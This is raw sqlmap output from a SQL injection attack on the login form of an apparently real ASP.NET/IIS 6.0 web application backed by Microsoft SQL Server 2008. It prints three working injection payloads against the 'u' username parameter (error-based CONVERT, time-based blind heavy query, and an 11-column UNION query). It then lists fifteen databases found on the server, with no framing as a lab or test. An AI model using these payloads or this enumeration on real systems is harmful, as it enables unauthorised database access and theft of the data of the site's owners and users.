sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: u=admin' AND 4945=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4945=4945) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'slPQ'='slPQ&p=admin Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) Payload: u=admin' OR 8107=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--&p=admin Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: u=admin' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(112)+CHAR(99)+CHAR(87)+CHAR(71)+CHAR(85)+CHAR(102)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &p=admin --- web server operating system: Windows 2003 or XP web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: Microsoft SQL Server 2008 available databases [15]: [*] exam [*] JiaKeYuJing [*] JNTT_ZK [*] master [*] model [*] msdb [*] OA_DB [*] qqgua8 [*] ReportServer [*] ReportServerTempDB [*] SeedTuiSong [*] task6899 [*] tempdb [*] wy_zhangwu [*] ziguan
